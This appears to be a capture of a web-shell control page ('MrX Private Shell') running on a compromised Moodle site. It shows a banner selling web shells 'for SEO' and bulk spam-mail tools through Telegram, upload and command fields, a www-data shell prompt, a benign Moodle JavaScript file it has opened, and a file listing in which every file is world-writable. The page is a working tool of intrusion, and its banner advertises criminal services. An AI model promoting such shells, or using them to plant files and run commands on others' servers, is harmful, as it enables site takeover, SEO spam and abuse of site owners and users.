__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
/**
 * Controls the preference for an individual notification type on the
 * message preference page.
 *
 * @module     core_message/notification_preference
 * @copyright  2016 Ryan Wyllie <ryan@moodle.com>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */
define("core_message/notification_preference",["jquery","core/ajax","core/notification","core_message/notification_processor"],(function($,Ajax,Notification,NotificationProcessor){const SELECTORS_PROCESSOR="[data-processor-name]",SELECTORS_STATE_INPUTS="[data-state] input",NotificationPreference=function(element,userId){this.root=$(element),this.userId=userId};return NotificationPreference.prototype.getPreferenceKey=function(){return this.root.attr("data-preference-key")},NotificationPreference.prototype.getEnabledPreferenceKey=function(){return this.getPreferenceKey()+"_enabled"},NotificationPreference.prototype.getProcessors=function(){return this.root.find(SELECTORS_PROCESSOR).map((function(index,element){return new NotificationProcessor($(element))}))},NotificationPreference.prototype.startLoading=function(){this.root.addClass("loading"),this.root.find(SELECTORS_STATE_INPUTS).prop("disabled",!0)},NotificationPreference.prototype.stopLoading=function(){this.root.removeClass("loading"),this.root.find(SELECTORS_STATE_INPUTS).prop("disabled",!1)},NotificationPreference.prototype.isLoading=function(){return this.root.hasClass("loading")},NotificationPreference.prototype.save=function(){if(this.isLoading())return $.Deferred().resolve();this.startLoading();let enabledValue="";this.getProcessors().each((function(index,processor){processor.isEnabled()&&(""===enabledValue?enabledValue=processor.getName():enabledValue+=","+processor.getName())})),""===enabledValue&&(enabledValue="none");const request={methodname:"core_user_update_user_preferences",args:{userid:this.userId,preferences:[{type:this.getEnabledPreferenceKey(),value:enabledValue}]}};return Ajax.call([request])[0].fail(Notification.exception).always(function(){this.stopLoading()}.bind(this))},NotificationPreference}));

//# sourceMappingURL=notification_preference.min.js.map

Filemanager

Name Type Size Permission Actions
default_notification_preferences.min.js File 1.89 KB 0777
default_notification_preferences.min.js.map File 4.55 KB 0777
message_drawer.min.js File 7.15 KB 0777
message_drawer.min.js.map File 18.49 KB 0777
message_drawer_events.min.js File 1.48 KB 0777
message_drawer_events.min.js.map File 3.24 KB 0777
message_drawer_helper.min.js File 1.76 KB 0777
message_drawer_helper.min.js.map File 3.44 KB 0777
message_drawer_lazy_load_list.min.js File 3.53 KB 0777
message_drawer_lazy_load_list.min.js.map File 12.61 KB 0777
message_drawer_router.min.js File 4.02 KB 0777
message_drawer_router.min.js.map File 14.08 KB 0777
message_drawer_routes.min.js File 568 B 0777
message_drawer_routes.min.js.map File 1.62 KB 0777
message_drawer_view_contact.min.js File 1.02 KB 0777
message_drawer_view_contact.min.js.map File 3.81 KB 0777
message_drawer_view_contacts.min.js File 3.1 KB 0777
message_drawer_view_contacts.min.js.map File 9.22 KB 0777
message_drawer_view_contacts_section_contacts.min.js File 2.65 KB 0777
message_drawer_view_contacts_section_contacts.min.js.map File 8.64 KB 0777
message_drawer_view_contacts_section_requests.min.js File 1.96 KB 0777
message_drawer_view_contacts_section_requests.min.js.map File 6.03 KB 0777
message_drawer_view_conversation.min.js File 41.3 KB 0777
message_drawer_view_conversation.min.js.map File 119.93 KB 0777
message_drawer_view_conversation_constants.min.js File 5.96 KB 0777
message_drawer_view_conversation_constants.min.js.map File 11.6 KB 0777
message_drawer_view_conversation_patcher.min.js File 20.28 KB 0777
message_drawer_view_conversation_patcher.min.js.map File 69.25 KB 0777
message_drawer_view_conversation_renderer.min.js File 24.69 KB 0777
message_drawer_view_conversation_renderer.min.js.map File 86.72 KB 0777
message_drawer_view_conversation_state_manager.min.js File 11.14 KB 0777
message_drawer_view_conversation_state_manager.min.js.map File 40.62 KB 0777
message_drawer_view_group_info.min.js File 2.27 KB 0777
message_drawer_view_group_info.min.js.map File 7.88 KB 0777
message_drawer_view_overview.min.js File 4.33 KB 0777
message_drawer_view_overview.min.js.map File 14.37 KB 0777
message_drawer_view_overview_section.min.js File 14.53 KB 0777
message_drawer_view_overview_section.min.js.map File 45.21 KB 0777
message_drawer_view_search.min.js File 13.86 KB 0777
message_drawer_view_search.min.js.map File 44 KB 0777
message_drawer_view_settings.min.js File 4.44 KB 0777
message_drawer_view_settings.min.js.map File 15.14 KB 0777
message_notification_preference.min.js File 970 B 0777
message_notification_preference.min.js.map File 2.75 KB 0777
message_popover.min.js File 1.46 KB 0777
message_popover.min.js.map File 4.67 KB 0777
message_preferences.min.js File 2.19 KB 0777
message_preferences.min.js.map File 6.14 KB 0777
message_repository.min.js File 12.07 KB 0777
message_repository.min.js.map File 44.79 KB 0777
message_send_bulk.min.js File 2.32 KB 0777
message_send_bulk.min.js.map File 4.75 KB 0777
message_user_button.min.js File 1.67 KB 0777
message_user_button.min.js.map File 5.23 KB 0777
notification_preference.min.js File 2.09 KB 0777
notification_preference.min.js.map File 6.31 KB 0777
notification_processor.min.js File 761 B 0777
notification_processor.min.js.map File 2.4 KB 0777
notification_processor_settings.min.js File 4.84 KB 0777
notification_processor_settings.min.js.map File 11.18 KB 0777
preferences_notifications_list_controller.min.js File 3.5 KB 0777
preferences_notifications_list_controller.min.js.map File 8.9 KB 0777
preferences_processor_form.min.js File 1.35 KB 0777
preferences_processor_form.min.js.map File 4.24 KB 0777
toggle_contact_button.min.js File 2.56 KB 0777
toggle_contact_button.min.js.map File 9.52 KB 0777
Filemanager